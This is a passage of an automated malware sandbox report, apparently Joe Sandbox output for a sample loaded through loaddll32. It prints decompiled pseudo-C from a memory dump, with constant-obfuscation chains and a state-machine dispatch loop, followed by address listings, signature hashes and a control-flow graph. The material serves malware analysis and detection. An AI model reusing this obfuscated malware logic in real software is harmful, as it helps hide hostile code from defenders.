                                                                                                                                                                            				_v2780 = _v2780 + 0xffffc18b;
                                                                                                                                                                            				_v2780 = _v2780 | 0x826dfd4e;
                                                                                                                                                                            				_v2780 = _v2780 ^ 0x827371e5;
                                                                                                                                                                            				_v2712 = 0x74bd84;
                                                                                                                                                                            				_v2712 = _v2712 >> 9;
                                                                                                                                                                            				_v2712 = _v2712 + 0xbcb6;
                                                                                                                                                                            				_v2712 = _v2712 ^ 0x0001f6d9;
                                                                                                                                                                            				_v2680 = 0x714a85;
                                                                                                                                                                            				_v2680 = _v2680 | 0x3dc400c8;
                                                                                                                                                                            				_v2680 = _v2680 ^ 0x3df5425d;
                                                                                                                                                                            				_v2612 = 0xace488;
                                                                                                                                                                            				_v2612 = _v2612 | 0xd2617c07;
                                                                                                                                                                            				_v2612 = _v2612 ^ 0xd2e83d7d;
                                                                                                                                                                            				_v2736 = 0x9a08fa;
                                                                                                                                                                            				_v2736 = _v2736 + 0x9c03;
                                                                                                                                                                            				_v2736 = _v2736 << 5;
                                                                                                                                                                            				_v2736 = _v2736 ^ 0x135d006f;
                                                                                                                                                                            				_v2652 = 0x41ccd2;
                                                                                                                                                                            				_v2652 = _v2652 ^ 0x97b2ef27;
                                                                                                                                                                            				_v2652 = _v2652 ^ 0x97fb61bc;
                                                                                                                                                                            				_v2764 = 0x9e119e;
                                                                                                                                                                            				_v2764 = _v2764 << 2;
                                                                                                                                                                            				_v2764 = _v2764 | 0x268f2d0f;
                                                                                                                                                                            				_v2764 = _v2764 / _t443;
                                                                                                                                                                            				_v2764 = _v2764 ^ 0x009ccc86;
                                                                                                                                                                            				_v2620 = 0x8f6e28;
                                                                                                                                                                            				_v2620 = _v2620 >> 3;
                                                                                                                                                                            				_v2620 = _v2620 ^ 0x00104951;
                                                                                                                                                                            				_v2772 = 0xe21e14;
                                                                                                                                                                            				_v2772 = _v2772 + 0xffff5b09;
                                                                                                                                                                            				_v2772 = _v2772 * 0x18;
                                                                                                                                                                            				_v2772 = _v2772 + 0xc00a;
                                                                                                                                                                            				_v2772 = _v2772 ^ 0x152b5515;
                                                                                                                                                                            				_v2608 = 0x3d3ea7;
                                                                                                                                                                            				_v2608 = _v2608 + 0x63eb;
                                                                                                                                                                            				_v2608 = _v2608 ^ 0x0030ec7d;
                                                                                                                                                                            				_v2644 = 0x866304;
                                                                                                                                                                            				_v2644 = _v2644 + 0x379c;
                                                                                                                                                                            				_v2644 = _v2644 ^ 0x008e4788;
                                                                                                                                                                            				_v2604 = 0xe77a6a;
                                                                                                                                                                            				_t121 =  &_v2604; // 0xe77a6a
                                                                                                                                                                            				_t444 = 0x63;
                                                                                                                                                                            				_v2604 =  *_t121 / _t444;
                                                                                                                                                                            				_v2604 = _v2604 ^ 0x000e0408;
                                                                                                                                                                            				_v2696 = 0xf5199c;
                                                                                                                                                                            				_v2696 = _v2696 << 8;
                                                                                                                                                                            				_v2696 = _v2696 << 3;
                                                                                                                                                                            				_v2696 = _v2696 ^ 0xa8c2da1f;
                                                                                                                                                                            				_v2636 = 0xbfea70;
                                                                                                                                                                            				_v2636 = _v2636 | 0x60f37e4e;
                                                                                                                                                                            				_v2636 = _v2636 ^ 0x60f450e6;
                                                                                                                                                                            				_v2720 = 0x6acbb3;
                                                                                                                                                                            				_t445 = 0x6c;
                                                                                                                                                                            				_v2720 = _v2720 / _t445;
                                                                                                                                                                            				_v2720 = _v2720 >> 9;
                                                                                                                                                                            				_v2720 = _v2720 ^ 0x00013488;
                                                                                                                                                                            				_v2704 = 0x72224f;
                                                                                                                                                                            				_v2704 = _v2704 << 9;
                                                                                                                                                                            				_v2704 = _v2704 + 0xffff0fb2;
                                                                                                                                                                            				_v2704 = _v2704 ^ 0xe44ad0e5;
                                                                                                                                                                            				_v2728 = 0xe68b79;
                                                                                                                                                                            				_v2728 = _v2728 | 0x8e61462a;
                                                                                                                                                                            				_v2728 = _v2728 >> 1;
                                                                                                                                                                            				_v2728 = _v2728 ^ 0x477bf727;
                                                                                                                                                                            				_v2616 = 0x4099b0;
                                                                                                                                                                            				_v2616 = _v2616 + 0xfa8f;
                                                                                                                                                                            				_v2616 = _v2616 ^ 0x0048c0a5;
                                                                                                                                                                            				_v2688 = 0xff8ffd;
                                                                                                                                                                            				_v2688 = _v2688 ^ 0x53972d47;
                                                                                                                                                                            				_t446 = 0x60;
                                                                                                                                                                            				_v2688 = _v2688 / _t446;
                                                                                                                                                                            				_v2688 = _v2688 ^ 0x00dac0dc;
                                                                                                                                                                            				_v2744 = 0xc2c855;
                                                                                                                                                                            				_v2744 = _v2744 | 0x821d7436;
                                                                                                                                                                            				_t447 = 0x65;
                                                                                                                                                                            				_v2744 = _v2744 * 0x46;
                                                                                                                                                                            				_v2744 = _v2744 ^ 0xc93dde39;
                                                                                                                                                                            				_v2664 = 0x8fcf69;
                                                                                                                                                                            				_v2664 = _v2664 ^ 0x92a1f028;
                                                                                                                                                                            				_v2664 = _v2664 ^ 0x922e5d56;
                                                                                                                                                                            				_v2672 = 0x138bb7;
                                                                                                                                                                            				_v2672 = _v2672 + 0xffff6c98;
                                                                                                                                                                            				_v2672 = _v2672 ^ 0x001bead2;
                                                                                                                                                                            				_v2784 = 0x1d404b;
                                                                                                                                                                            				_v2784 = _v2784 ^ 0xbb38c348;
                                                                                                                                                                            				_v2784 = _v2784 >> 0xb;
                                                                                                                                                                            				_v2784 = _v2784 | 0xeccea58e;
                                                                                                                                                                            				_v2784 = _v2784 ^ 0xecdc694e;
                                                                                                                                                                            				_v2676 = 0xbdcffc;
                                                                                                                                                                            				_v2676 = _v2676 ^ 0x5aef785e;
                                                                                                                                                                            				_v2676 = _v2676 ^ 0x5a57f2e1;
                                                                                                                                                                            				_v2768 = 0xceb2dd;
                                                                                                                                                                            				_v2768 = _v2768 | 0xafbcd5ba;
                                                                                                                                                                            				_v2768 = _v2768 * 0xf;
                                                                                                                                                                            				_v2768 = _v2768 / _t447;
                                                                                                                                                                            				_v2768 = _v2768 ^ 0x00c1507c;
                                                                                                                                                                            				_v2732 = 0xba5c67;
                                                                                                                                                                            				_v2732 = _v2732 + 0xffff3085;
                                                                                                                                                                            				_v2732 = _v2732 ^ 0x29fec498;
                                                                                                                                                                            				_v2732 = _v2732 ^ 0x29414316;
                                                                                                                                                                            				_v2740 = 0xfebc70;
                                                                                                                                                                            				_v2740 = _v2740 >> 6;
                                                                                                                                                                            				_t448 = 0x4c;
                                                                                                                                                                            				_v2740 = _v2740 * 0x46;
                                                                                                                                                                            				_v2740 = _v2740 ^ 0x01107382;
                                                                                                                                                                            				_v2776 = 0x1fdbbd;
                                                                                                                                                                            				_v2776 = _v2776 + 0xffff7a05;
                                                                                                                                                                            				_v2776 = _v2776 << 5;
                                                                                                                                                                            				_v2776 = _v2776 + 0xffff7a3d;
                                                                                                                                                                            				_v2776 = _v2776 ^ 0x03eed3d9;
                                                                                                                                                                            				_v2708 = 0xe5e896;
                                                                                                                                                                            				_v2708 = _v2708 << 6;
                                                                                                                                                                            				_v2708 = _v2708 + 0x807d;
                                                                                                                                                                            				_v2708 = _v2708 ^ 0x3973facc;
                                                                                                                                                                            				_v2716 = 0xdc1d9;
                                                                                                                                                                            				_v2716 = _v2716 | 0xfc1937aa;
                                                                                                                                                                            				_v2716 = _v2716 + 0xffffd03c;
                                                                                                                                                                            				_v2716 = _v2716 ^ 0xfc1f97ce;
                                                                                                                                                                            				_v2648 = 0xeb72b6;
                                                                                                                                                                            				_v2648 = _v2648 >> 8;
                                                                                                                                                                            				_v2648 = _v2648 ^ 0x0003133b;
                                                                                                                                                                            				_v2724 = 0x35c70c;
                                                                                                                                                                            				_v2724 = _v2724 + 0xffff3120;
                                                                                                                                                                            				_v2724 = _v2724 + 0xda65;
                                                                                                                                                                            				_v2724 = _v2724 ^ 0x003bd395;
                                                                                                                                                                            				_v2656 = 0x588c44;
                                                                                                                                                                            				_v2656 = _v2656 ^ 0x3c8fee8a;
                                                                                                                                                                            				_v2656 = _v2656 ^ 0x3cdfb996;
                                                                                                                                                                            				_v2632 = 0xa98095;
                                                                                                                                                                            				_v2632 = _v2632 + 0xf08e;
                                                                                                                                                                            				_v2632 = _v2632 ^ 0x00ab49e1;
                                                                                                                                                                            				_v2640 = 0x908171;
                                                                                                                                                                            				_v2640 = _v2640 << 0xa;
                                                                                                                                                                            				_v2640 = _v2640 ^ 0x42069508;
                                                                                                                                                                            				_v2748 = 0xf99537;
                                                                                                                                                                            				_v2748 = _v2748 >> 9;
                                                                                                                                                                            				_v2748 = _v2748 | 0x4d3f7029;
                                                                                                                                                                            				_v2748 = _v2748 ^ 0x4d356fb4;
                                                                                                                                                                            				_v2700 = 0xf7c115;
                                                                                                                                                                            				_v2700 = _v2700 + 0xffffc630;
                                                                                                                                                                            				_v2700 = _v2700 >> 5;
                                                                                                                                                                            				_v2700 = _v2700 ^ 0x0003a618;
                                                                                                                                                                            				_v2624 = 0xf73d89;
                                                                                                                                                                            				_v2624 = _v2624 * 0x3f;
                                                                                                                                                                            				_v2624 = _v2624 ^ 0x3cd41ae8;
                                                                                                                                                                            				_v2684 = 0x237d3e;
                                                                                                                                                                            				_v2684 = _v2684 + 0xffff7bf2;
                                                                                                                                                                            				_v2684 = _v2684 << 0xb;
                                                                                                                                                                            				_v2684 = _v2684 ^ 0x17c7121d;
                                                                                                                                                                            				_v2752 = 0x3823b3;
                                                                                                                                                                            				_v2752 = _v2752 * 0x2a;
                                                                                                                                                                            				_v2752 = _v2752 + 0xffff9ab5;
                                                                                                                                                                            				_v2752 = _v2752 >> 9;
                                                                                                                                                                            				_v2752 = _v2752 ^ 0x0000d6a9;
                                                                                                                                                                            				_v2760 = 0x9d905;
                                                                                                                                                                            				_t420 = _v2760 / _t448;
                                                                                                                                                                            				_v2760 = _t420;
                                                                                                                                                                            				_v2760 = _v2760 + 0xffff5226;
                                                                                                                                                                            				_v2760 = _v2760 ^ 0x58f88d53;
                                                                                                                                                                            				_v2760 = _v2760 ^ 0xa70b0c4e;
                                                                                                                                                                            				while(_t489 != 0x219adc7) {
                                                                                                                                                                            					if(_t489 == 0x472b880) {
                                                                                                                                                                            						E02F51A34(_v2744,  &_v1040, _t448, _t448, _v2664, _v2672, _v2784, _t448, _v2792, _v2676);
                                                                                                                                                                            						_push(_v2776);
                                                                                                                                                                            						_push(_v2740);
                                                                                                                                                                            						_push(_v2732);
                                                                                                                                                                            						E02F72D0A(_v2716, __eflags,  &_v2080, _v2648, _v2724, _v2656, 0x2f5196c,  &_v520,  &_v1040, E02F6E1F8(0x2f5196c, _v2768, __eflags));
                                                                                                                                                                            						E02F6FECB(_t422, _v2632, _v2640, _v2748, _v2700);
                                                                                                                                                                            						__eflags = 0;
                                                                                                                                                                            						return E02F685FF(_v2624, _v2684, 0, 0,  &_v520, 0, _v2752, 0, _v2760);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t501 = _t489 - 0x6430241;
                                                                                                                                                                            					if(_t489 != 0x6430241) {
                                                                                                                                                                            						L7:
                                                                                                                                                                            						__eflags = _t489 - 0xc99ad3;
                                                                                                                                                                            						if(__eflags != 0) {
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							return _t420;
                                                                                                                                                                            						}
                                                                                                                                                                            						L10:
                                                                                                                                                                            						return _t420;
                                                                                                                                                                            					}
                                                                                                                                                                            					E02F70DB1(_v2788,  &_v2600, _t501, _v2660, _t448, _v2692);
                                                                                                                                                                            					 *((short*)(E02F609DD(_v2668,  &_v2600, _v2628, _v2756))) = 0;
                                                                                                                                                                            					E02F5BAA9(_v2780, _v2712, _t501, _v2680, _v2612,  &_v1560);
                                                                                                                                                                            					_push(_v2620);
                                                                                                                                                                            					_push(_v2764);
                                                                                                                                                                            					_push(_v2652);
                                                                                                                                                                            					E02F72D0A(_v2608, _t501,  &_v1560, _v2644, _v2604, _v2696, 0x2f5188c,  &_v2080,  &_v2600, E02F6E1F8(0x2f5188c, _v2736, _t501));
                                                                                                                                                                            					E02F6FECB(_t434, _v2636, _v2720, _v2704, _v2728);
                                                                                                                                                                            					_t448 = _v2616;
                                                                                                                                                                            					_t420 = E02F5BFBE( &_v2080, _t488, _v2688);
                                                                                                                                                                            					_t493 =  &(_t493[0x18]);
                                                                                                                                                                            					if(_t420 != 0) {
                                                                                                                                                                            						_t489 = 0x472b880;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					goto L10;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t489 = 0x6430241;
                                                                                                                                                                            				goto L7;
                                                                                                                                                                            			}



































































                                                                                                                                                                            0x02f67d5b
                                                                                                                                                                            0x02f67d61
                                                                                                                                                                            0x02f67d6a
                                                                                                                                                                            0x02f67d71
                                                                                                                                                                            0x02f67d78
                                                                                                                                                                            0x02f67d7f
                                                                                                                                                                            0x02f67d90
                                                                                                                                                                            0x02f67d94
                                                                                                                                                                            0x02f67d9a
                                                                                                                                                                            0x02f67da1
                                                                                                                                                                            0x02f67da6
                                                                                                                                                                            0x02f67db1
                                                                                                                                                                            0x02f67db2
                                                                                                                                                                            0x02f67db6
                                                                                                                                                                            0x02f67dbe
                                                                                                                                                                            0x02f67dc9
                                                                                                                                                                            0x02f67dd1
                                                                                                                                                                            0x02f67ddc
                                                                                                                                                                            0x02f67de4
                                                                                                                                                                            0x02f67dec
                                                                                                                                                                            0x02f67df4
                                                                                                                                                                            0x02f67dfc
                                                                                                                                                                            0x02f67e07
                                                                                                                                                                            0x02f67e12
                                                                                                                                                                            0x02f67e1d
                                                                                                                                                                            0x02f67e28
                                                                                                                                                                            0x02f67e30
                                                                                                                                                                            0x02f67e3b
                                                                                                                                                                            0x02f67e43
                                                                                                                                                                            0x02f67e50
                                                                                                                                                                            0x02f67e54
                                                                                                                                                                            0x02f67e5c
                                                                                                                                                                            0x02f67e64
                                                                                                                                                                            0x02f67e6c
                                                                                                                                                                            0x02f67e74
                                                                                                                                                                            0x02f67e7c
                                                                                                                                                                            0x02f67e84
                                                                                                                                                                            0x02f67e8c
                                                                                                                                                                            0x02f67e94
                                                                                                                                                                            0x02f67e99
                                                                                                                                                                            0x02f67ea1
                                                                                                                                                                            0x02f67ea9
                                                                                                                                                                            0x02f67eb4
                                                                                                                                                                            0x02f67ebf
                                                                                                                                                                            0x02f67eca
                                                                                                                                                                            0x02f67ed5
                                                                                                                                                                            0x02f67ee0
                                                                                                                                                                            0x02f67eeb
                                                                                                                                                                            0x02f67ef3
                                                                                                                                                                            0x02f67efb
                                                                                                                                                                            0x02f67f00
                                                                                                                                                                            0x02f67f08
                                                                                                                                                                            0x02f67f13
                                                                                                                                                                            0x02f67f1e
                                                                                                                                                                            0x02f67f29
                                                                                                                                                                            0x02f67f31
                                                                                                                                                                            0x02f67f36
                                                                                                                                                                            0x02f67f44
                                                                                                                                                                            0x02f67f48
                                                                                                                                                                            0x02f67f50
                                                                                                                                                                            0x02f67f5b
                                                                                                                                                                            0x02f67f63
                                                                                                                                                                            0x02f67f6e
                                                                                                                                                                            0x02f67f76
                                                                                                                                                                            0x02f67f83
                                                                                                                                                                            0x02f67f87
                                                                                                                                                                            0x02f67f8f
                                                                                                                                                                            0x02f67f99
                                                                                                                                                                            0x02f67fa4
                                                                                                                                                                            0x02f67faf
                                                                                                                                                                            0x02f67fba
                                                                                                                                                                            0x02f67fc5
                                                                                                                                                                            0x02f67fd0
                                                                                                                                                                            0x02f67fdb
                                                                                                                                                                            0x02f67fe6
                                                                                                                                                                            0x02f67fef
                                                                                                                                                                            0x02f67ff4
                                                                                                                                                                            0x02f67ffd
                                                                                                                                                                            0x02f68008
                                                                                                                                                                            0x02f68010
                                                                                                                                                                            0x02f68015
                                                                                                                                                                            0x02f6801a
                                                                                                                                                                            0x02f68022
                                                                                                                                                                            0x02f6802d
                                                                                                                                                                            0x02f68038
                                                                                                                                                                            0x02f68043
                                                                                                                                                                            0x02f6804f
                                                                                                                                                                            0x02f68054
                                                                                                                                                                            0x02f6805a
                                                                                                                                                                            0x02f6805f
                                                                                                                                                                            0x02f68067
                                                                                                                                                                            0x02f6806f
                                                                                                                                                                            0x02f68074
                                                                                                                                                                            0x02f6807c
                                                                                                                                                                            0x02f68084
                                                                                                                                                                            0x02f6808c
                                                                                                                                                                            0x02f68094
                                                                                                                                                                            0x02f68098
                                                                                                                                                                            0x02f680a0
                                                                                                                                                                            0x02f680ab
                                                                                                                                                                            0x02f680b6
                                                                                                                                                                            0x02f680c1
                                                                                                                                                                            0x02f680c9
                                                                                                                                                                            0x02f680d5
                                                                                                                                                                            0x02f680da
                                                                                                                                                                            0x02f680e0
                                                                                                                                                                            0x02f680e8
                                                                                                                                                                            0x02f680f0
                                                                                                                                                                            0x02f680fd
                                                                                                                                                                            0x02f680fe
                                                                                                                                                                            0x02f68102
                                                                                                                                                                            0x02f6810a
                                                                                                                                                                            0x02f68115
                                                                                                                                                                            0x02f68120
                                                                                                                                                                            0x02f6812b
                                                                                                                                                                            0x02f68136
                                                                                                                                                                            0x02f68141
                                                                                                                                                                            0x02f6814c
                                                                                                                                                                            0x02f68154
                                                                                                                                                                            0x02f6815c
                                                                                                                                                                            0x02f68161
                                                                                                                                                                            0x02f68169
                                                                                                                                                                            0x02f68171
                                                                                                                                                                            0x02f6817c
                                                                                                                                                                            0x02f68187
                                                                                                                                                                            0x02f68192
                                                                                                                                                                            0x02f6819a
                                                                                                                                                                            0x02f681a7
                                                                                                                                                                            0x02f681b1
                                                                                                                                                                            0x02f681b5
                                                                                                                                                                            0x02f681bd
                                                                                                                                                                            0x02f681c7
                                                                                                                                                                            0x02f681d4
                                                                                                                                                                            0x02f681e1
                                                                                                                                                                            0x02f681e9
                                                                                                                                                                            0x02f681f1
                                                                                                                                                                            0x02f681fd
                                                                                                                                                                            0x02f681fe
                                                                                                                                                                            0x02f68202
                                                                                                                                                                            0x02f6820a
                                                                                                                                                                            0x02f68212
                                                                                                                                                                            0x02f6821a
                                                                                                                                                                            0x02f6821f
                                                                                                                                                                            0x02f68227
                                                                                                                                                                            0x02f6822f
                                                                                                                                                                            0x02f68237
                                                                                                                                                                            0x02f6823c
                                                                                                                                                                            0x02f68244
                                                                                                                                                                            0x02f6824c
                                                                                                                                                                            0x02f68254
                                                                                                                                                                            0x02f6825c
                                                                                                                                                                            0x02f68264
                                                                                                                                                                            0x02f6826c
                                                                                                                                                                            0x02f68277
                                                                                                                                                                            0x02f6827f
                                                                                                                                                                            0x02f6828a
                                                                                                                                                                            0x02f68292
                                                                                                                                                                            0x02f6829a
                                                                                                                                                                            0x02f682a2
                                                                                                                                                                            0x02f682aa
                                                                                                                                                                            0x02f682b5
                                                                                                                                                                            0x02f682c0
                                                                                                                                                                            0x02f682cb
                                                                                                                                                                            0x02f682d6
                                                                                                                                                                            0x02f682e1
                                                                                                                                                                            0x02f682ec
                                                                                                                                                                            0x02f682f7
                                                                                                                                                                            0x02f682ff
                                                                                                                                                                            0x02f6830a
                                                                                                                                                                            0x02f68312
                                                                                                                                                                            0x02f68317
                                                                                                                                                                            0x02f6831f
                                                                                                                                                                            0x02f68327
                                                                                                                                                                            0x02f6832f
                                                                                                                                                                            0x02f68337
                                                                                                                                                                            0x02f6833c
                                                                                                                                                                            0x02f68344
                                                                                                                                                                            0x02f68357
                                                                                                                                                                            0x02f6835e
                                                                                                                                                                            0x02f68369
                                                                                                                                                                            0x02f68371
                                                                                                                                                                            0x02f68379
                                                                                                                                                                            0x02f6837e
                                                                                                                                                                            0x02f68386
                                                                                                                                                                            0x02f68393
                                                                                                                                                                            0x02f68397
                                                                                                                                                                            0x02f6839f
                                                                                                                                                                            0x02f683a4
                                                                                                                                                                            0x02f683ac
                                                                                                                                                                            0x02f683b8
                                                                                                                                                                            0x02f683ba
                                                                                                                                                                            0x02f683be
                                                                                                                                                                            0x02f683c6
                                                                                                                                                                            0x02f683ce
                                                                                                                                                                            0x02f683d6
                                                                                                                                                                            0x02f683e4
                                                                                                                                                                            0x02f68546
                                                                                                                                                                            0x02f6854b
                                                                                                                                                                            0x02f68554
                                                                                                                                                                            0x02f68558
                                                                                                                                                                            0x02f685a1
                                                                                                                                                                            0x02f685c1
                                                                                                                                                                            0x02f685d0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f685f1
                                                                                                                                                                            0x02f683ea
                                                                                                                                                                            0x02f683ec
                                                                                                                                                                            0x02f6850a
                                                                                                                                                                            0x02f6850a
                                                                                                                                                                            0x02f68510
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f685fe
                                                                                                                                                                            0x02f685fe
                                                                                                                                                                            0x02f685fe
                                                                                                                                                                            0x02f68409
                                                                                                                                                                            0x02f6842e
                                                                                                                                                                            0x02f68452
                                                                                                                                                                            0x02f68457
                                                                                                                                                                            0x02f68463
                                                                                                                                                                            0x02f68467
                                                                                                                                                                            0x02f684b6
                                                                                                                                                                            0x02f684d6
                                                                                                                                                                            0x02f684e2
                                                                                                                                                                            0x02f684f1
                                                                                                                                                                            0x02f684f6
                                                                                                                                                                            0x02f684fb
                                                                                                                                                                            0x02f68501
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f68501
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f684fb
                                                                                                                                                                            0x02f68508
                                                                                                                                                                            0x00000000

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $P$)p?M$>}#$Gqx$O"r$\f%0$^xZ$jz$o$}0
                                                                                                                                                                            • API String ID: 0-1313373530
                                                                                                                                                                            • Opcode ID: 710bc6a6efcec92dc1a7fa609f27a675a3304c1a35ab4641e36c09941f867702
                                                                                                                                                                            • Instruction ID: 6a3443b8ae434f34bb4ad4672c357819f11b5d19162910726514d19b77606da7
                                                                                                                                                                            • Opcode Fuzzy Hash: 710bc6a6efcec92dc1a7fa609f27a675a3304c1a35ab4641e36c09941f867702
                                                                                                                                                                            • Instruction Fuzzy Hash: E11203715093809FD3A8CF61C949A9BFBE2FBC4748F108A1DE2D996260D7B58909CF53
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 928 2f5238c-2f52ad1 929 2f52ad8-2f52add 928->929 930 2f52ae2-2f52ae8 929->930 931 2f52d22-2f52d51 call 2f6c387 call 2f6bc6b 930->931 932 2f52aee-2f52af4 930->932 952 2f52d56-2f52d5c 931->952 934 2f52d78-2f52dad call 2f685ff 932->934 935 2f52afa-2f52afc 932->935 947 2f52ddf-2f52de9 934->947 948 2f52daf-2f52dd2 call 2f71538 934->948 938 2f52d64-2f52d76 935->938 939 2f52b02-2f52b04 935->939 941 2f52dd9-2f52dde call 2f71538 938->941 943 2f52cb3-2f52cee call 2f6017b 939->943 944 2f52b0a-2f52b10 939->944 941->947 960 2f52cf0-2f52d1d call 2f71538 * 2 943->960 961 2f52c89-2f52c8b 943->961 949 2f52b16-2f52b1c 944->949 950 2f52ca9-2f52cae 944->950 948->941 955 2f52b7c-2f52c87 call 2f70db1 call 2f609dd call 2f5baa9 call 2f6e1f8 call 2f72d0a call 2f6fecb call 2f5bfbe 949->955 956 2f52b1e-2f52b24 949->956 950->930 952->930 958 2f52d62 952->958 955->961 986 2f52c90-2f52ca4 955->986 956->952 963 2f52b2a-2f52b2c 956->963 958->947 960->961 961->929 964 2f52b72-2f52b77 963->964 965 2f52b2e-2f52b62 call 2f69774 963->965 964->930 965->947 974 2f52b68-2f52b6d 965->974 974->929 986->930
                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                            			E02F5238C(void* __ecx) {
                                                                                                                                                                            				char _v524;
                                                                                                                                                                            				char _v1044;
                                                                                                                                                                            				char _v1564;
                                                                                                                                                                            				intOrPtr _v1576;
                                                                                                                                                                            				char _v1580;
                                                                                                                                                                            				signed int _v1584;
                                                                                                                                                                            				signed int _v1588;
                                                                                                                                                                            				signed int _v1592;
                                                                                                                                                                            				signed int _v1596;
                                                                                                                                                                            				signed int _v1600;
                                                                                                                                                                            				signed int _v1604;
                                                                                                                                                                            				signed int _v1608;
                                                                                                                                                                            				signed int _v1612;
                                                                                                                                                                            				signed int _v1616;
                                                                                                                                                                            				signed int _v1620;
                                                                                                                                                                            				signed int _v1624;
                                                                                                                                                                            				signed int _v1628;
                                                                                                                                                                            				signed int _v1632;
                                                                                                                                                                            				signed int _v1636;
                                                                                                                                                                            				signed int _v1640;
                                                                                                                                                                            				signed int _v1644;
                                                                                                                                                                            				signed int _v1648;
                                                                                                                                                                            				signed int _v1652;
                                                                                                                                                                            				signed int _v1656;
                                                                                                                                                                            				signed int _v1660;
                                                                                                                                                                            				signed int _v1664;
                                                                                                                                                                            				signed int _v1668;
                                                                                                                                                                            				signed int _v1672;
                                                                                                                                                                            				signed int _v1676;
                                                                                                                                                                            				signed int _v1680;
                                                                                                                                                                            				signed int _v1684;
                                                                                                                                                                            				signed int _v1688;
                                                                                                                                                                            				signed int _v1692;
                                                                                                                                                                            				signed int _v1696;
                                                                                                                                                                            				signed int _v1700;
                                                                                                                                                                            				signed int _v1704;
                                                                                                                                                                            				signed int _v1708;
                                                                                                                                                                            				signed int _v1712;
                                                                                                                                                                            				unsigned int _v1716;
                                                                                                                                                                            				signed int _v1720;
                                                                                                                                                                            				signed int _v1724;
                                                                                                                                                                            				signed int _v1728;
                                                                                                                                                                            				signed int _v1732;
                                                                                                                                                                            				signed int _v1736;
                                                                                                                                                                            				signed int _v1740;
                                                                                                                                                                            				signed int _v1744;
                                                                                                                                                                            				signed int _v1748;
                                                                                                                                                                            				signed int _v1752;
                                                                                                                                                                            				signed int _v1756;
                                                                                                                                                                            				signed int _v1760;
                                                                                                                                                                            				signed int _v1764;
                                                                                                                                                                            				signed int _v1768;
                                                                                                                                                                            				signed int _v1772;
                                                                                                                                                                            				signed int _v1776;
                                                                                                                                                                            				signed int _v1780;
                                                                                                                                                                            				signed int _v1784;
                                                                                                                                                                            				signed int _v1788;
                                                                                                                                                                            				signed int _v1792;
                                                                                                                                                                            				void* _t472;
                                                                                                                                                                            				void* _t474;
                                                                                                                                                                            				void* _t477;
                                                                                                                                                                            				void* _t481;
                                                                                                                                                                            				void* _t496;
                                                                                                                                                                            				signed int _t498;
                                                                                                                                                                            				signed int _t499;
                                                                                                                                                                            				signed int _t500;
                                                                                                                                                                            				signed int _t501;
                                                                                                                                                                            				signed int _t502;
                                                                                                                                                                            				void* _t503;
                                                                                                                                                                            				signed int _t507;
                                                                                                                                                                            				signed int _t537;
                                                                                                                                                                            				signed int _t548;
                                                                                                                                                                            				void* _t550;
                                                                                                                                                                            				void* _t555;
                                                                                                                                                                            
                                                                                                                                                                            				_v1584 = _v1584 & 0x00000000;
                                                                                                                                                                            				_v1788 = 0x33fdc0;
                                                                                                                                                                            				_v1788 = _v1788 >> 6;
                                                                                                                                                                            				_v1788 = _v1788 + 0xffff8381;
                                                                                                                                                                            				_v1788 = _v1788 | 0x21bcf8d5;
                                                                                                                                                                            				_v1788 = _v1788 ^ 0x23bcfbfd;
                                                                                                                                                                            				_v1744 = 0xdaa9b2;
                                                                                                                                                                            				_v1744 = _v1744 >> 0xa;
                                                                                                                                                                            				_v1744 = _v1744 >> 0xd;
                                                                                                                                                                            				_v1744 = _v1744 * 0xc;
                                                                                                                                                                            				_t496 = __ecx;
                                                                                                                                                                            				_v1744 = _v1744 ^ 0x00028d02;
                                                                                                                                                                            				_t550 = 0x854d193;
                                                                                                                                                                            				_v1632 = 0x7e6112;
                                                                                                                                                                            				_v1632 = _v1632 << 4;
                                                                                                                                                                            				_v1632 = _v1632 ^ 0x07e103ba;
                                                                                                                                                                            				_v1716 = 0xd48fca;
                                                                                                                                                                            				_v1716 = _v1716 + 0x54b9;
                                                                                                                                                                            				_v1716 = _v1716 >> 3;
                                                                                                                                                                            				_v1716 = _v1716 ^ 0x00172ea2;
                                                                                                                                                                            				_v1612 = 0xc953de;
                                                                                                                                                                            				_v1612 = _v1612 + 0xffff7488;
                                                                                                                                                                            				_v1612 = _v1612 ^ 0x00c8e870;
                                                                                                                                                                            				_v1660 = 0xfcf42a;
                                                                                                                                                                            				_v1660 = _v1660 ^ 0x4c4ed76c;
                                                                                                                                                                            				_v1660 = _v1660 ^ 0x4cb955ce;
                                                                                                                                                                            				_v1600 = 0xa6934b;
                                                                                                                                                                            				_v1600 = _v1600 >> 7;
                                                                                                                                                                            				_v1600 = _v1600 ^ 0x00032972;
                                                                                                                                                                            				_v1604 = 0xac816b;
                                                                                                                                                                            				_t498 = 0x70;
                                                                                                                                                                            				_v1604 = _v1604 * 0x21;
                                                                                                                                                                            				_v1604 = _v1604 ^ 0x16380272;
                                                                                                                                                                            				_v1696 = 0x6f97e6;
                                                                                                                                                                            				_v1696 = _v1696 | 0xa083c342;
                                                                                                                                                                            				_v1696 = _v1696 ^ 0x07d73a4d;
                                                                                                                                                                            				_v1696 = _v1696 ^ 0xa73f6dc5;
